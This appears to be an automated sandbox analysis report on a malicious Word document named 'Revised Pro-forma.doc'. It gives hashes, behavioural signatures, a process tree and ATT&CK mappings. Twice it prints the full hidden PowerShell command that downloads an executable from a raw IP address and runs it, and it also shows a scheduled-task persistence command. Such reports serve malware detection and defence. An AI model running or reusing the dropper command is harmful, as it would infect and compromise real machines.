cfbbe350a3a5b906db87fa22e8a58a1760cfa776e6f1e0149b73a02b799d9b3a

Analysis

max time kernel
144s
max time network
151s
platform
windows7_x64
resource
win7
submitted
07-07-2020 07:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Revised Pro-forma.doc
Size

245KB
MD5

31355a427ccc38ba77df8c75626e33f7
SHA1

47d42d7885c1f27ebdae079d70a72042c94debe9
SHA256

cfbbe350a3a5b906db87fa22e8a58a1760cfa776e6f1e0149b73a02b799d9b3a
SHA512

917d2f60b8ac0f2f18158e382a8ce66ffbf13ddca867786a2833d1c9f0e54922e9d3db080eec8ec59fbe8d00b0c77095224f34a6347999e2378d6e24284943bf

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

httP://198.12.66.110/JCwZyb0zjyDTDj3.exe

Signatures

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	304	WerFault.exe
Token: SeDebugPrivilege	1792	Uem7qZgy.exe
Token: SeDebugPrivilege	748	Uem7qZgy.exe

Loads dropped DLL 5 IoCs

pid	Process
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1792 set thread context of 748	1792	Uem7qZgy.exe	37

Office loads VBA resources, possible macro or embedded object present

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1612	2040	powershell.exe	23
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	552	2040	powershell.exe	23

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 1612	2040	WINWORD.EXE	26
PID 2040 wrote to memory of 1612	2040	WINWORD.EXE	26
PID 2040 wrote to memory of 1612	2040	WINWORD.EXE	26
PID 2040 wrote to memory of 552	2040	WINWORD.EXE	28
PID 2040 wrote to memory of 552	2040	WINWORD.EXE	28
PID 2040 wrote to memory of 552	2040	WINWORD.EXE	28
PID 1612 wrote to memory of 1792	1612	powershell.exe	30
PID 1612 wrote to memory of 1792	1612	powershell.exe	30
PID 1612 wrote to memory of 1792	1612	powershell.exe	30
PID 1612 wrote to memory of 1792	1612	powershell.exe	30
PID 552 wrote to memory of 1768	552	powershell.exe	31
PID 552 wrote to memory of 1768	552	powershell.exe	31
PID 552 wrote to memory of 1768	552	powershell.exe	31
PID 552 wrote to memory of 1768	552	powershell.exe	31
PID 1768 wrote to memory of 304	1768	Uem7qZgy.exe	34
PID 1768 wrote to memory of 304	1768	Uem7qZgy.exe	34
PID 1768 wrote to memory of 304	1768	Uem7qZgy.exe	34
PID 1768 wrote to memory of 304	1768	Uem7qZgy.exe	34
PID 1792 wrote to memory of 368	1792	Uem7qZgy.exe	35
PID 1792 wrote to memory of 368	1792	Uem7qZgy.exe	35
PID 1792 wrote to memory of 368	1792	Uem7qZgy.exe	35
PID 1792 wrote to memory of 368	1792	Uem7qZgy.exe	35
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37
PID 1792 wrote to memory of 748	1792	Uem7qZgy.exe	37

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1612	powershell.exe
552	powershell.exe
1612	powershell.exe
552	powershell.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
1792	Uem7qZgy.exe
748	Uem7qZgy.exe
748	Uem7qZgy.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
5	1612	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1792	Uem7qZgy.exe
1768	Uem7qZgy.exe
748	Uem7qZgy.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
304	1768	WerFault.exe	31

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
368	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2040	WINWORD.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2040	WINWORD.EXE
2040	WINWORD.EXE
2040	WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Revised Pro-forma.doc"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://198.12.66.110/JCwZyb0zjyDTDj3.exe','C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  PID:1612
- - C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe
    "C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Executes dropped EXE
    PID:1792
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\enWFIQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4BDE.tmp"
      4⤵
      Creates scheduled task(s)
      PID:368
  - - C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe
      "{path}"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious behavior: EnumeratesProcesses
      Executes dropped EXE
      PID:748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://198.12.66.110/JCwZyb0zjyDTDj3.exe','C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  PID:552
- - C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe
    "C:\Users\Admin\AppData\Roaming\Uem7qZgy.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    PID:1768
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 672
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Program crash
      PID:304

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/304-29-0x00000000026D0000-0x00000000026E1000-memory.dmp

Filesize
68KB

Download
memory/304-14-0x0000000001E70000-0x0000000001E81000-memory.dmp

Filesize
68KB

Download
memory/748-31-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/748-35-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/748-34-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download